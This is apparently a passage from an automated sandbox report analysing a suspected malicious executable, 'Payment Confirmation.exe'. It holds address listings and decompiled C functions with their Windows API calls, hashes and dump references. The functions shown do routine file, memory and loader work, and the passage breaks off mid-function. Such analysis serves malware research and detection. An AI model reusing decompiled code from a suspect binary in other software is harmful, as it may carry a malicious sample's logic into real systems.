                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                  • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                  • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                  • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10008BD7, Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10008BD7() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x1001c594; // 0x200
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x1001c594 = _t3;
				}
				_t4 = E1000A3C9(_t3, 4); // executed
				 *0x1001c598 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x1001b498;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x1001b718) {
							break;
						}
						_t4 =  *0x1001c598; // 0x0
					}
					return 0;
				} else {
					 *0x1001c594 = _t13;
					_t4 = E1000A3C9(_t13, 4);
					 *0x1001c598 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}









                                                  0x10008bd7
                                                  0x10008bdf
                                                  0x10008be2
                                                  0x10008bed
                                                  0x10008bef
                                                  0x00000000
                                                  0x10008bef
                                                  0x10008be4
                                                  0x10008be4
                                                  0x10008bf1
                                                  0x10008bf1
                                                  0x10008bf1
                                                  0x10008bf9
                                                  0x10008bfe
                                                  0x10008c07
                                                  0x10008c27
                                                  0x10008c27
                                                  0x10008c29
                                                  0x10008c2e
                                                  0x10008c2e
                                                  0x10008c31
                                                  0x10008c34
                                                  0x10008c3d
                                                  0x00000000
                                                  0x00000000
                                                  0x10008c3f
                                                  0x10008c3f
                                                  0x10008c49
                                                  0x10008c09
                                                  0x10008c0c
                                                  0x10008c12
                                                  0x10008c17
                                                  0x10008c20
                                                  0x00000000
                                                  0x10008c22
                                                  0x10008c24
                                                  0x10008c26
                                                  0x10008c26
                                                  0x10008c20

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __calloc_crt
                                                  • String ID:
                                                  • API String ID: 3494438863-0
                                                  • Opcode ID: e5c950c2f7397f782e8c53f8c13f4e24740a17047e3527f2cc37934b07a22490
                                                  • Instruction ID: 938b3a9675f3f7158708b770e86479a9a6cf0a121883718ee9c18bbf31321153
                                                  • Opcode Fuzzy Hash: e5c950c2f7397f782e8c53f8c13f4e24740a17047e3527f2cc37934b07a22490
                                                  • Instruction Fuzzy Hash: 3AF0C2B1209A22CEF314CB59ADC2E9937A5F7093B4F118456F544DA18BE334EDC18364
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x82622c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                                                  0x0040138a
                                                  0x004013fa
                                                  0x00401392
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                  • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                  • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                  • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                  0x00405f30
                                                  0x00405f33
                                                  0x00405f3a
                                                  0x00405f42
                                                  0x00405f4e
                                                  0x00000000
                                                  0x00405f55
                                                  0x00405f45
                                                  0x00405f4c
                                                  0x00000000
                                                  0x00405f5d
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                    • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                    • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                    • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                  • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                  0x00405873
                                                  0x00405880
                                                  0x00405895
                                                  0x0040589b

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment Confirmation.exe,80000000,00000003), ref: 00405873
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                  0x00405854
                                                  0x0040585d
                                                  0x00000000
                                                  0x00405866
                                                  0x0040586c

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                  • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                  0x004053c9
                                                  0x004053d1
                                                  0x00000000
                                                  0x004053d7
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                  • GetLastError.KERNEL32 ref: 004053D7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                  • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x00403085
                                                  0x00403098
                                                  0x004030a0
                                                  0x00000000
                                                  0x004030a7
                                                  0x00000000
                                                  0x004030a9

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                  • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100088A2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E100088A2() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10008909(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                  0x100088a2
                                                  0x100088a4
                                                  0x100088a6
                                                  0x100088a8
                                                  0x100088b0

                                                  APIs
                                                  • _doexit.LIBCMT ref: 100088A8
                                                    • Part of subcall function 10008909: __lock.LIBCMT ref: 10008917
                                                    • Part of subcall function 10008909: RtlDecodePointer.NTDLL(10018F60,0000001C,1000889D,?,00000001,00000000,?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 10008956
                                                    • Part of subcall function 10008909: DecodePointer.KERNEL32(?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 10008967
                                                    • Part of subcall function 10008909: EncodePointer.KERNEL32(00000000,?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 10008980
                                                    • Part of subcall function 10008909: DecodePointer.KERNEL32(-00000004,?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 10008990
                                                    • Part of subcall function 10008909: EncodePointer.KERNEL32(00000000,?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 10008996
                                                    • Part of subcall function 10008909: DecodePointer.KERNEL32(?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 100089AC
                                                    • Part of subcall function 10008909: DecodePointer.KERNEL32(?,1000867A,000000FF,?,10009F5B,00000011,?,?,1000CB5C,0000000D), ref: 100089B7
                                                    • Part of subcall function 10008909: __initterm.LIBCMT ref: 100089DF
                                                    • Part of subcall function 10008909: __initterm.LIBCMT ref: 100089F0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                  • String ID:
                                                  • API String ID: 3712619029-0
                                                  • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction ID: fad7acc19554d7e453de38ad80f08d86cff397b233e286baf7e9b4394e6975f1
                                                  • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                  • Instruction Fuzzy Hash: 4CA002A9BD430425F960B1502C43F6425016790F41FD90050BB482C1C7B4C623584557
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004030B3(long _a4) {
